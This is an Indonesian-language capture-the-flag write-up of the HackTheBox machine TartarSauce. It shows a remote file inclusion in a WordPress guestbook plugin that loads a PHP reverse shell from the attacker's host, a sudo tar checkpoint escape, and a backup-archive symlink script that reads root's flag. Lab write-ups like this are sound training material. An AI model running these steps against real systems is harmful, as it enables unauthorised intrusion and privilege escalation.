Halo kembali lagi, sekarang gw akan bahas salah satu mesin yang ada di hackthebox lagi, yaitu TartarSauce.
Reconnaissance
Seperti biasa, kita akan lakukan scanning pada target dengan menggunakan nmap:
└─# nmap -sSCV -O -A 10.10.10.88 -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 01:48 EST
Warning: 10.10.10.88 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.88
Host is up (0.35s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Landing Page
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 5.0 (94%), Linux 5.1 (94%), Linux 3.2 - 4.9 (93%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 4.1 (92%), Linux 4.10 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 834.73 ms 10.10.14.1
2 834.81 ms 10.10.10.88
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.82 seconds
Kita bisa lihat disini hanya port 80 yang terbuka.
Enumeration
Selanjutnya kita akan lakukan direktori bruteforce dengan menggunakan gobuster.
Disini kita mendapatkan direktori /webservices/wp, yang mana ketika dibuka akan muncul page WordPress.
WordPress Scanning
Disini kita enumerasi lagi menggunakan wpscan https://github.com/wpscanteam/wpscan
└─# wpscan --url http://10.10.10.88:80/webservices/wp -e ap --plugins-detection aggressive
Disini kita akan fokus di plugins gwolle-gb, yang dimana disini masih menggunakan versi Stable tag: 2.3.10
Kita akan cari exploitnya menggunakan searchsploit:
└─# searchsploit gwolle
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion | php/webapps/38861.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Initial Access
Disini menunjukan kita bisa langsung reverse shell dengan menggunakan php shell wp-load.php, kita akan langsung eksekusi tapi sebelumnya kita copy terlebih dahulu webshellnya:
─# cp /usr/share/webshells/php/php-reverse-shell.php /root/latihan/tartarsauce/wp-load.php
Kita ganti port dan IP nya.
Disini kita buat HTTP server dan juga listeningnya:
└─# nc -lvnp 1337
Selanjutnya kita buka URL-nya:
http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.67:9898/
Maka shell akan langsung didapatkan:
└─# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.67] from (UNKNOWN) [10.10.10.88] 60714
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
04:48:44 up 9:39, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
Privilege Escalation (www-data → onuma)
Jika sudah masuk, kita perlu melakukan privex, terlebih dahulu kita call bash-nya:
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@TartarSauce:/$
www-data@TartarSauce:/$ whoami
whoami
www-data
Kita enumerasi sudo nya dengan:
www-data@TartarSauce:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
Disini kita bisa run tar command, dengan user yang dapat menggunakannya adalah onuma.
Kita akan restrict environment-nya dengan menggunakan tar https://gtfobins.github.io/gtfobins/tar/
www-data@TartarSauce:/$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
<ll /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
onuma@TartarSauce:/$
Kita sudah masuk di user onuma sekaligus disini kita sudah dapatkan user flag-nya.
onuma@TartarSauce:~$ cat user.txt
f0820eb871a7ee58............
Privilege Escalation (onuma → root)
Selanjutnya kita akan menggunakan tool https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh untuk melakukan enumerasi:
onuma@TartarSauce:/tmp$ wget http://10.10.14.67:9898/LinEnum.sh
wget http://10.10.14.67:9898/LinEnum.sh
--2024-12-23 05:05:12-- http://10.10.14.67:9898/LinEnum.sh
onuma@TartarSauce:/tmp$ ls
ls
LinEnum.sh
pspy32
systemd-private-2411860d7fc34e98be06a8f13c493560-systemd-timesyncd.service-iOxPb4
vmware-root
Kita jalankan tools-nya, berikan permission terlebih dahulu:
chmod +x LinEnum.sh
./LinEnum.sh
Disini bisa kita lihat, bahwa terdapat backuperer yang berjalan di background:
onuma@TartarSauce:/tmp$ locate backuperer
locate backuperer
/etc/systemd/system/multi-user.target.wants/backuperer.timer
/lib/systemd/system/backuperer.service
/lib/systemd/system/backuperer.timer
/usr/sbin/backuperer
onuma@TartarSauce:/tmp$ cat /etc/systemd/system/multi-user.target.wants/backuperer.timer
< /etc/systemd/system/multi-user.target.wants/backuperer.timer
[Unit]
Description=Runs backuperer every 5 mins
[Timer]
# Time to wait after booting before we run first time
OnBootSec=5min
# Time between running each consecutive time
OnUnitActiveSec=5min
Unit=backuperer.service
[Install]
WantedBy=multi-user.target
Dan jika kita perhatikan, backuperer berjalan dalam rentan waktu setiap 5 menit. Jika kita lihat base script-nya:
onuma@TartarSauce:/tmp$ cat /usr/sbin/backuperer
cat /usr/sbin/backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
Yang dimana ketika kita breakdown variablenya:
basedir=/var/www/html– Direktori root web server.bkpdir=/var/backups– Direktori penyimpanan backup.tmpdir=/var/tmp– Direktori untuk file sementara.testmsg=$bkpdir/onuma_backup_test.txt– File untuk log uji backup.errormsg=$bkpdir/onuma_backup_error.txt– File untuk log kesalahan backup.tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)– File sementara unik dengan nama acak.check=$tmpdir/check– File status atau penanda proses.
Kita akan coba buat bash script untuk handle bagian pemantauan perubahan file di backup direktori /var/tmp dan modifikasi kontennya:
#!/bin/bash
# work out of shm
cd /dev/shm
# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
sleep 10;
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done
# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .
# get filename
fn=$(echo $cur | cut -d'/' -f4)
# extract archive
tar -zxf $fn
# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt
# remove old archive
rm $fn
# create new archive
tar czf $fn var
# put it back, and clean up
mv $fn $cur
rm $fn
rm -rf var
# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt
Kita download filenya lalu pindahkan ke folder /dev/shm dan jalankan:
onuma@TartarSauce:/tmp$ cp exploit.sh /dev/shm
cp exploit.sh /dev/shm
onuma@TartarSauce:/tmp$ cd /dev/shm
cd /dev/shm
onuma@TartarSauce:/dev/shm$ ls
ls
exploit.sh
onuma@TartarSauce:/dev/shm$ ./exploit.sh
./exploit.sh
Waiting for archive filename to change..
Disini akan membutuhkan waktu untuk menunggu backuperer-nya running, jadi kita tunggu, dan kita akan langsung mendapatkan root flag-nya!
